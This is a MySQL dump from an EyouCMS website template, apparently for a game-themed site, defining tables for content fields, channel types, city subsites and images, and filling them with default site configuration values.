INSERT INTO `ey_channelfield` VALUES ('180', 'content', '7', '内容详情', 'htmltext', 'longtext', '0', '', '', '', '0', '1', '1', '0', '1', '0', '0', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('181', 'appraise', '0', '评价数', 'int', 'int(10)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533091930', '1533091930', '0');
INSERT INTO `ey_channelfield` VALUES ('182', 'collection', '0', '收藏数', 'int', 'int(10)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533091930', '1533091930', '0');
INSERT INTO `ey_channelfield` VALUES ('183', 'subtitle', '0', '副标题', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1636338535', '1636338535', '0');
INSERT INTO `ey_channelfield` VALUES ('184', 'origin', '0', '来源', 'text', 'varchar(30)', '30', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1636338535', '1636338535', '0');
INSERT INTO `ey_channelfield` VALUES ('185', 'stypeid', '0', '副栏目', 'text', 'varchar(90)', '90', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1636338535', '1636338535', '0');
INSERT INTO `ey_channelfield` VALUES ('186', 'target', '-99', '新窗口打开', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1547890773', '1547890773', '0');
INSERT INTO `ey_channelfield` VALUES ('187', 'nofollow', '-99', '防抓取', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1547890773', '1547890773', '0');
INSERT INTO `ey_channelfield` VALUES ('188', 'content_ey_m', '1', '手机端内容详情', 'htmltext', 'longtext', '250', '', '', '', '0', '1', '1', '0', '1', '0', '0', '100', '1', '1533464713', '1623047123', '0');
INSERT INTO `ey_channelfield` VALUES ('189', 'content_ey_m', '2', '手机端内容详情', 'htmltext', 'longtext', '250', '', '', '', '0', '1', '1', '0', '1', '0', '0', '100', '1', '1645086030', '1645086039', '0');
INSERT INTO `ey_channelfield` VALUES ('190', 'content_ey_m', '3', '手机端内容详情', 'htmltext', 'longtext', '250', '', '', '', '0', '1', '1', '0', '1', '0', '0', '100', '1', '1533359588', '1533359588', '0');
INSERT INTO `ey_channelfield` VALUES ('191', 'content_ey_m', '4', '手机端内容详情', 'htmltext', 'longtext', '250', '', '', '', '0', '1', '1', '0', '1', '0', '0', '100', '1', '1533359752', '1533359752', '0');
INSERT INTO `ey_channelfield` VALUES ('192', 'content_ey_m', '5', '手机端内容详情', 'htmltext', 'longtext', '250', '', '', '', '0', '1', '1', '0', '1', '0', '0', '100', '1', '1591957363', '1591957363', '0');
INSERT INTO `ey_channelfield` VALUES ('193', 'content_ey_m', '6', '手机端内容详情', 'htmltext', 'longtext', '250', '', '', '', '0', '1', '1', '0', '1', '0', '0', '100', '1', '1533464715', '1533464715', '0');
INSERT INTO `ey_channelfield` VALUES ('194', 'content_ey_m', '7', '手机端内容详情', 'htmltext', 'longtext', '250', '', '', '', '0', '1', '1', '0', '1', '0', '0', '100', '1', '1602320145', '1602320145', '0');
INSERT INTO `ey_channelfield` VALUES ('195', 'restric_type', '0', '限制模式,0=免费,1=付费,2=会员专享,3=会员付费', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1616293251', '1616293251', '0');
INSERT INTO `ey_channelfield` VALUES ('196', 'diy_dirpath', '-99', '自定义HTML保存路径', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('197', 'rulelist', '-99', '列表静态文件存放规则', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('198', 'ruleview', '-99', '文档静态文件存放规则', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('199', 'typearcrank', '-99', '阅读权限:0=开放浏览,-1=待审核稿件', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1547890773', '1547890773', '0');
INSERT INTO `ey_channelfield` VALUES ('200', 'empty_logic', '-99', '空内容逻辑', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
-- -----------------------------
-- Table structure for `ey_channelfield_bind`
-- -----------------------------
DROP TABLE IF EXISTS `ey_channelfield_bind`;
CREATE TABLE `ey_channelfield_bind` (
`id` int(10) NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`typeid` int(10) DEFAULT '0' COMMENT '栏目ID',
`field_id` int(10) DEFAULT '0' COMMENT '自定义字段ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='栏目与自定义字段绑定表';
-- -----------------------------
-- Table structure for `ey_channelfield_log`
-- -----------------------------
DROP TABLE IF EXISTS `ey_channelfield_log`;
CREATE TABLE `ey_channelfield_log` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`name` varchar(50) DEFAULT '' COMMENT '字段名称',
`channel_id` int(10) DEFAULT '0' COMMENT '模型ID',
`dtype` varchar(32) DEFAULT '' COMMENT '字段类型',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='自定义字段日志表';
-- -----------------------------
-- Table structure for `ey_channeltype`
-- -----------------------------
DROP TABLE IF EXISTS `ey_channeltype`;
CREATE TABLE `ey_channeltype` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`nid` varchar(50) NOT NULL DEFAULT '' COMMENT '识别id',
`title` varchar(30) DEFAULT '' COMMENT '名称',
`ntitle` varchar(30) DEFAULT '' COMMENT '左侧菜单名称',
`table` varchar(50) DEFAULT '' COMMENT '表名',
`ctl_name` varchar(50) DEFAULT '' COMMENT '控制器名称(区分大小写)',
`status` tinyint(1) DEFAULT '1' COMMENT '状态(1=启用,0=屏蔽)',
`ifsystem` tinyint(1) DEFAULT '0' COMMENT '字段分类,1=系统(不可修改),0=自定义',
`is_repeat_title` tinyint(1) DEFAULT '1' COMMENT '文档标题重复,1=允许,0=不允许',
`is_release` tinyint(1) DEFAULT '0' COMMENT '模型是否允许应用于会员投稿发布,1是,0否',
`is_litpic_users_release` tinyint(1) DEFAULT '1' COMMENT '缩略图是否应用于会员投稿,1=允许,0=不允许',
`data` text COMMENT '额外序列化存储数据',
`is_del` tinyint(1) DEFAULT '0' COMMENT '伪删除,1=是,0=否',
`sort_order` smallint(6) DEFAULT '50' COMMENT '排序',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
UNIQUE KEY `idention` (`nid`) USING BTREE,
UNIQUE KEY `ctl_name` (`ctl_name`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=101 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_channeltype`
-- -----------------------------
INSERT INTO `ey_channeltype` VALUES ('1', 'article', '文章模型', '文章', 'article', 'Article', '1', '1', '1', '1', '1', '', '0', '1', '0', '1613985970');
INSERT INTO `ey_channeltype` VALUES ('4', 'download', '下载模型', '下载', 'download', 'Download', '0', '1', '1', '1', '1', '', '0', '4', '0', '1613985970');
INSERT INTO `ey_channeltype` VALUES ('2', 'product', '产品模型', '产品', 'product', 'Product', '0', '1', '1', '1', '1', '', '0', '2', '0', '1613985970');
INSERT INTO `ey_channeltype` VALUES ('8', 'guestbook', '留言模型', '留言', 'guestbook', 'Guestbook', '1', '1', '1', '1', '1', '', '0', '8', '1509197711', '1613985970');
INSERT INTO `ey_channeltype` VALUES ('6', 'single', '单页模型', '单页', 'single', 'Single', '1', '1', '1', '1', '1', '', '0', '6', '1523091961', '1613985970');
INSERT INTO `ey_channeltype` VALUES ('3', 'images', '图集模型', '图集', 'images', 'Images', '0', '1', '1', '1', '1', '', '0', '3', '1523929121', '1613985970');
INSERT INTO `ey_channeltype` VALUES ('5', 'media', '视频模型', '视频', 'media', 'Media', '0', '1', '1', '1', '1', '', '0', '5', '1509197711', '1564532747');
INSERT INTO `ey_channeltype` VALUES ('7', 'special', '专题模型', '专题', 'special', 'Special', '0', '1', '1', '1', '1', '', '0', '7', '1509197711', '1564532747');
INSERT INTO `ey_channeltype` VALUES ('51', 'ask', '问答模型', '问答', 'ask', 'Ask', '0', '1', '1', '1', '1', '', '1', '9', '1509197711', '1686213673');
-- -----------------------------
-- Table structure for `ey_citysite`
-- -----------------------------
DROP TABLE IF EXISTS `ey_citysite`;
CREATE TABLE `ey_citysite` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '表id',
`name` varchar(32) DEFAULT '' COMMENT '地区名称',
`level` tinyint(4) DEFAULT '0' COMMENT '地区等级 分省市县区',
`parent_id` int(10) DEFAULT '0' COMMENT '父id',
`topid` int(10) DEFAULT '0' COMMENT '顶级ID',
`initial` varchar(5) DEFAULT '' COMMENT '首字母',
`status` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '状态(1:开启,0:隐藏)',
`is_hot` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否热门',
`domain` varchar(50) NOT NULL DEFAULT '' COMMENT '二级域名',
`is_open` tinyint(1) DEFAULT '0' COMMENT '二级域名开启状态,0=否,1=是',
`seoset` tinyint(1) DEFAULT '0' COMMENT 'SEO设置,0=使用主站,1=自定义',
`seo_title` varchar(200) DEFAULT '' COMMENT 'SEO标题',
`seo_keywords` varchar(200) DEFAULT '' COMMENT 'SEO关键词',
`seo_description` text COMMENT 'SEO描述',
`sort_order` int(6) unsigned NOT NULL DEFAULT '100' COMMENT '排序',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
`showall` tinyint(3) DEFAULT '1' COMMENT '是否显示主站信息',
PRIMARY KEY (`id`),
KEY `domain` (`domain`) USING BTREE,
KEY `level` (`level`,`status`) USING BTREE,
KEY `initial` (`initial`,`sort_order`,`id`) USING BTREE,
KEY `parent_id` (`parent_id`,`status`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='城市分站表';
-- -----------------------------
-- Table structure for `ey_common_pic`
-- -----------------------------
DROP TABLE IF EXISTS `ey_common_pic`;
CREATE TABLE `ey_common_pic` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '常用图片ID',
`pic_path` varchar(255) NOT NULL DEFAULT '' COMMENT '图片地址',
`lang` varchar(50) DEFAULT 'cn' COMMENT '多语言',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='常用图片';
-- -----------------------------
-- Records of `ey_common_pic`
-- -----------------------------
INSERT INTO `ey_common_pic` VALUES ('1', '/uploads/allimg/20230608/1-23060Q6401A46.jpg', 'cn', '1686213618', '1686213618');
-- -----------------------------
-- Table structure for `ey_config`
-- -----------------------------
DROP TABLE IF EXISTS `ey_config`;
CREATE TABLE `ey_config` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(50) DEFAULT '' COMMENT '配置的key键名',
`value` text,
`inc_type` varchar(64) DEFAULT '' COMMENT '配置分组',
`desc` varchar(50) DEFAULT '' COMMENT '描述',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`is_del` tinyint(1) DEFAULT '0' COMMENT '是否已删除,0=否,1=是',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=178 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_config`
-- -----------------------------
INSERT INTO `ey_config` VALUES ('1', 'is_mark', '0', 'water', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('2', 'mark_txt', '易优Cms', 'water', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('3', 'mark_img', '/public/upload/water/2018/05/08/93806077e5a4c4e12ceed30df5cde761.png', 'water', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('4', 'mark_width', '200', 'water', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('5', 'mark_height', '50', 'water', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('6', 'mark_degree', '54', 'water', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('7', 'mark_quality', '56', 'water', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('8', 'mark_sel', '9', 'water', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('9', 'sms_time_out', '120', 'sms', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('10', 'theme_style', '1', 'basic', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('11', 'file_size', '100', 'basic', '', 'cn', '0', '1613985993');
INSERT INTO `ey_config` VALUES ('12', 'image_type', 'jpg|gif|png|bmp|jpeg|ico', 'basic', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('13', 'file_type', 'zip|gz|rar|iso|doc|xls|ppt|wps', 'basic', '', 'cn', '0', '1613986020');
INSERT INTO `ey_config` VALUES ('14', 'media_type', 'swf|mpg|mp3|rm|rmvb|wmv|wma|wav|mid|mov|mp4', 'basic', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('15', 'web_keywords', '', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('17', 'sms_platform', '1', 'sms', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('18', 'seo_viewtitle_format', '2', 'seo', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('19', 'smtp_server', 'smtp.qq.com', 'smtp', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('20', 'smtp_port', '465', 'smtp', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('21', 'smtp_user', 'xxxxxxxxx@qq.com', 'smtp', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('22', 'smtp_pwd', 'xxxxxxxxxxx', 'smtp', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('23', 'inc_type', 'smtp', 'smtp', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('24', 'mark_type', 'img', 'water', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('25', 'mark_txt_size', '30', 'water', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('26', 'mark_txt_color', '#000000', 'water', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('27', 'oss_switch', '0', 'oss', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('28', 'web_name', '传奇竞技游戏类网站模板', 'web', '', 'cn', '0', '1686213600');
INSERT INTO `ey_config` VALUES ('29', 'web_logo', '/public/upload/system/2018/08/29/a6e8898701720768fba2ccd39f5f7ab5.png', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('30', 'web_ico', '/favicon.ico', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('31', 'web_basehost', 'http://e15.eyou.hk', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('32', 'web_description', '', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('79', 'web_recordnum', '粤ICP备888999号', 'web', '', 'cn', '0', '1686213600');
INSERT INTO `ey_config` VALUES ('33', 'web_copyright', 'Copyright © 2012-2023 某某网站 版权所有', 'web', '', 'cn', '0', '1686213600');
INSERT INTO `ey_config` VALUES ('34', 'web_thirdcode_pc', '', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('35', 'web_thirdcode_wap', '', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('39', 'seo_arcdir', '/html', 'seo', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('40', 'seo_pseudo', '1', 'seo', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('41', 'list_symbol', '>', 'basic', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('42', 'sitemap_auto', '1', 'sitemap', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('43', 'sitemap_not1', '0', 'sitemap', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('44', 'sitemap_not2', '1', 'sitemap', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('45', 'sitemap_xml', '1', 'sitemap', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('46', 'sitemap_txt', '0', 'sitemap', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('47', 'sitemap_zzbaidutoken', '', 'sitemap', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('48', 'seo_expires_in', '7200', 'seo', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('55', 'web_title', '传奇竞技游戏类网站模板', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('56', 'smtp_test_eamil', 'xxxxxxxx@qq.com', 'smtp', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('57', 'web_authortoken', '6e27af8a47788c33317c98fd9b0d8e03', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('58', 'web_attr_3', '广东省广州市', 'web', '', 'cn', '0', '1686213619');
INSERT INTO `ey_config` VALUES ('59', 'web_attr_2', '13988889999', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('60', 'web_attr_1', '诚信为本:市场永远在变,诚信永远不变。', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('61', 'web_attr_4', '020-66889888', 'web', '', 'cn', '0', '1686213619');
INSERT INTO `ey_config` VALUES ('81', 'web_attr_5', 'admin@youweb.com', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('62', 'seo_inlet', '1', 'seo', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('63', 'web_cmspath', '', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('64', 'web_sqldatapath', '/data/sqldata_qEwCvkDbGu1MSwfr4F94', 'web', '', 'cn', '0', '1686213564');
INSERT INTO `ey_config` VALUES ('65', 'web_cmsurl', '', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('66', 'web_templets_dir', '/template', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('67', 'web_templeturl', '/template', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('68', 'web_templets_pc', '/template/pc', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('69', 'web_templets_m', '/template/mobile', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('70', 'web_eyoucms', 'http://www.eyoucms.com', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('78', '_cmscopyright', 'pmsa9DMfLoc9pNENhfJgDu2i', 'php', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('76', 'seo_liststitle_format', '2', 'seo', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('77', 'web_status', '0', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('80', 'web_is_authortoken', '0', 'web', '', 'cn', '0', '1686213557');
INSERT INTO `ey_config` VALUES ('82', 'web_attr_6', '/uploads/allimg/20230608/1-23060Q6401A46.jpg', 'web', '', 'cn', '0', '1686213619');
INSERT INTO `ey_config` VALUES ('83', 'web_attr_7', '88889999', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('84', 'seo_rewrite_format', '2', 'seo', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('85', 'seo_dynamic_format', '1', 'seo', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('86', 'system_sql_mode', 'ONLY_FULL_GROUP_BY,STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION', 'system', '', 'cn', '0', '1668565094');
INSERT INTO `ey_config` VALUES ('87', 'web_adminbasefile', '/login.php', 'web', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('88', 'system_home_default_lang', 'cn', 'system', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('89', 'system_langnum', '1', 'system', '', 'cn', '0', '0');
INSERT INTO `ey_config` VALUES ('90', 'system_version', 'v1.6.3', 'system', '', 'cn', '0', '1686213584');
INSERT INTO `ey_config` VALUES ('91', 'php_eyou_blacklist', '', 'php', '', 'cn', '0', '1559187937');
INSERT INTO `ey_config` VALUES ('92', 'system_upgrade_filelist', 'YXBwbGljYXRpb24vY29tbW9uL2NvbnRyb2xsZXIvQ29tbW9uLnBocDxicj5hcHBsaWNhdGlvbi9jb21tb24vbG9naWMvU21zTG9naWMucGhwPGJyPmFwcGxpY2F0aW9uL2NvbW1vbi9sb2dpYy9TaG9wQ29tbW9uTG9naWMucGhwPGJyPmFwcGxpY2F0aW9uL2NvbW1vbi9sb2dpYy9BcmN0eXBlTG9naWMucGhwPGJyPmFwcGxpY2F0aW9uL2NvbW1vbi9tb2RlbC9TaG9wUHVibGljSGFuZGxlLnBocDxicj5hcHBsaWNhdGlvbi9jb21tb24vbW9kZWwvQXJjdHlwZS5waHA8YnI+YXBwbGljYXRpb24vY29tbW9uL21vZGVsL0NoYW5uZWx0eXBlLnBocDxicj5hcHBsaWNhdGlvbi9jb21tb24vbW9kZWwvVXNlcnNMZXZlbC5waHA8YnI+YXBwbGljYXRpb24vY29tbW9uL21vZGVsL0xhbmd1YWdlLnBocDxicj5hcHBsaWNhdGlvbi9yb3V0ZS5waHA8YnI+YXBwbGljYXRpb24vdXNlci9jb250cm9sbGVyL1BheUFwaS5waHA8YnI+YXBwbGljYXRpb24vdXNlci9jb250cm9sbGVyL1BheS5waHA8YnI+YXBwbGljYXRpb24vdXNlci9jb250cm9sbGVyL1VzZXJzUmVsZWFzZS5waHA8YnI+YXBwbGljYXRpb24vdXNlci9jb250cm9sbGVyL1Nob3AucGhwPGJyPmFwcGxpY2F0aW9uL3VzZXIvY29udHJvbGxlci9Vc2Vycy5waHA8YnI+YXBwbGljYXRpb24vdXNlci9sb2dpYy9QYXlBcGlMb2dpYy5waHA8YnI+YXBwbGljYXRpb24vdXNlci9sb2dpYy9TbXRwbWFpbExvZ2ljLnBocDxicj5hcHBsaWNhdGlvbi91c2VyL21vZGVsL1BheS5waHA8YnI+YXBwbGljYXRpb24vdXNlci9tb2RlbC9NZWRpYUZpbGUucGhwPGJyPmFwcGxpY2F0aW9uL3VzZXIvbW9kZWwvU2hvcC5waHA8YnI+YXBwbGljYXRpb24vY29tbW9uLnBocDxicj5hcHBsaWNhdGlvbi9mdW5jdGlvbi5waHA8YnI+YXBwbGljYXRpb24vYXBpL2NvbnRyb2xsZXIvdjEvQXBpLnBocDxicj5hcHBsaWNhdGlvbi9hcGkvY29udHJvbGxlci92MS9Vc2Vycy5waHA8YnI+YXBwbGljYXRpb24vYXBpL2NvbnRyb2xsZXIvQWpheC5waHA8YnI+YXBwbGljYXRpb24vYXBpL2xvZ2ljL3YxL0FwaUxvZ2ljLnBocDxicj5hcHBsaWNhdGlvbi9hcGkvbW9kZWwvdjEvQXBpLnBocDxicj5hcHBsaWNhdGlvbi9hcGkvbW9kZWwvdjEvUG9zdGVyLnBocDxicj5hcHBsaWNhdGlvbi9hcGkvbW9kZWwvdjEvVXNlci5waHA8YnI+YXBwbGljYXRpb24vYXBpL21vZGVsL3YxL1Nob3AucGhwPGJyPmFwcGxpY2F0aW9uL2FwaS9tb2RlbC92MS9Bc2sucGhwPGJyPmFwcGxpY2F0aW9uL2FkbWluL2NvbW1vbi5waHA8YnI+YXBwbGljYXRpb24vYWRtaW4vYmVoYXZpb3IvTW9kdWxlSW5pdEJlaGF2aW9yLnBocDxicj5hcHBsaWNhdGlvbi9hZG1pbi9iZWhhdmlvci9BdXRoUm9sZUJlaGF2aW9yLnBocDxicj5hcHBsaWNhdGlvbi9hZG1pbi9iZWhhdmlvci9BcHBFbmRCZWhhdmlvci5waHA8YnI+YXBwbGljYXRpb24vYWRtaW4vYmVoYXZpb3IvVmlld0ZpbHRlckJlaGF2aW9yLnBocDxicj5hcHBsaWNhdGlvbi9hZG1pbi9iZWhhdmlvci9BY3Rpb25CZWdpbkJlaGF2aW9yLnBocDxicj5hcHBsaWNhdGlvbi9hZG1pbi9jb250cm9sbGVyL09yZGVyVmVyaWZ5LnBocDxicj5hcHBsaWNhdGlvbi9hZG1pbi9jb250cm9sbGVyL0ltYWdlcy5waHA8YnI+YXBwbGljYXRpb24vYWRtaW4vY29udHJvbGxlci9XZWFwcC5waHA8YnI+YXBwbGljYXRpb24vYWRtaW4vY29udHJvbGxlci9QYXlBcGkucGhwPGJyPmFwcGxpY2F0aW9uL2FkbWluL2NvbnRyb2xsZXIvQWRtaW4ucGhwPGJyPmFwcGxpY2F0aW9uL2FkbWluL2NvbnRyb2xsZXIvTm90aWNlLnBocDxicj5hcHBsaWNhdGlvbi9hZG1pbi9jb250cm9sbGVyL0FyY3R5cGUucGhwPGJyPmFwcGxpY2F0aW9uL2FkbWluL2NvbnRyb2xsZXIvTWVkaWEucGhwPGJyPmFwcGxpY2F0aW9uL2FkbWluL2NvbnRyb2xsZXIvQXJjaGl2ZXMucGhwPGJyPmFwcGxpY2F0aW9uL2FkbWluL2NvbnRyb2xsZXIvQXJ0aWNsZS5waHA8YnI+YXBwbGljYXRpb24vYWRtaW4vY29udHJvbGxlci9TZWN1cml0eS5waHA8YnI+YXBwbGljYXRpb24vYWRtaW4vY29udHJvbGxlci9Vc2Vyc1JlbGVhc2UucGhwPGJyPmFwcGxpY2F0aW9uL2FkbWluL2NvbnRyb2xsZXIvTGV2ZWwucGhwPGJyPmFwcGxpY2F0aW9uL2FkbWluL2NvbnRyb2xsZXIvVGFncy5waHA8YnI+YXBwbGljYXRpb24vYWRtaW4vY29udHJvbGxlci9Db3Vwb24ucGhwPGJyPmFwcGxpY2F0aW9uL2FkbWluL2NvbnRyb2xsZXIvUHJvZHVjdC5waHA8YnI+YXBwbGljYXRpb24vYWRtaW4vY29udHJvbGxlci9OYXZpZ2F0aW9uLnBocDxicj5hcHBsaWNhdGlvbi9hZG1pbi9jb250cm9sbGVyL0Jhc2UucGhw', 'system', '', 'cn', '0', '1686213571');
INSERT INTO `ey_config` VALUES ('164', 'php_websensitive', '5aix5LmQDXzljZrlvakNfOS4lueVjOadrw185aSc5bqXDXzotYzljZoNfOaequaUrw186aOO5pq0DXxib2INfOaKvOazqA18OyZhbXA7Iw18YeeJhw185aSn54mHDXzmrKfnvo4=', 'php', '', 'cn', '0', '1686213569');
INSERT INTO `ey_config` VALUES ('165', 'php_atqueryrequest', 'eyIwIjp7ImV4cGlyZV90aW1lIjoxMjk2MDAwfSwiMSI6eyJleHBpcmVfdGltZSI6ODY0MDAwfSwiMS41Ijp7ImV4cGlyZV90aW1lIjo4NjQwMDB9LCIyIjp7ImV4cGlyZV90aW1lIjo4NjQwMDB9fQ==', 'php', '', 'cn', '0', '1686213569');
INSERT INTO `ey_config` VALUES ('166', 'php_allow_service_os', 'eyJjb2RlIjoxLCJtc2ciOiJcdTY4YzBcdTZkNGJcdTUyMzBcdTY1YjBcdTcyNDhcdTY3MmMiLCJtc2cxIjoiXHU1NTQ2XHU3NTI4XHU3MjQ4XHU2NzJjXHU2NTJmXHU2MzAxXHU1NzI4XHU3ZWJmXHU2NmY0XHU2NWIwIn0=', 'php', '', 'cn', '0', '1686213569');
INSERT INTO `ey_config` VALUES ('167', 'php_atqueryrequest_time', '1686213569', 'php', '', 'cn', '0', '1686213569');
INSERT INTO `ey_config` VALUES ('168', 'php_atqueryrequest_time2', '1686213569', 'php', '', 'cn', '0', '1686213569');
INSERT INTO `ey_config` VALUES ('169', 'search_tabu_words', '<\r\n>\r\n\"\r\n;\r\n,\r\n@\r\n&\r\n#\r\n\\\r\n*', 'search', '', 'cn', '0', '1686213588');
INSERT INTO `ey_config` VALUES ('170', 'web_anti_brushing', '0', 'web', '', 'cn', '0', '1686213588');
INSERT INTO `ey_config` VALUES ('171', 'web_status_mode', '0', 'web', '', 'cn', '0', '1686213600');
INSERT INTO `ey_config` VALUES ('172', 'web_status_text', '网站暂时关闭,维护中……', 'web', '', 'cn', '0', '1686213600');
INSERT INTO `ey_config` VALUES ('173', 'web_status_url', '', 'web', '', 'cn', '0', '1686213600');
INSERT INTO `ey_config` VALUES ('174', 'web_status_tpl', '', 'web', '', 'cn', '0', '1686213600');
INSERT INTO `ey_config` VALUES ('175', 'web_recordnum_mode', '0', 'web', '', 'cn', '0', '1686213600');
INSERT INTO `ey_config` VALUES ('176', 'web_garecordnum', '', 'web', '', 'cn', '0', '1686213600');
INSERT INTO `ey_config` VALUES ('177', 'web_garecordnum_mode', '0', 'web', '', 'cn', '0', '1686213600');
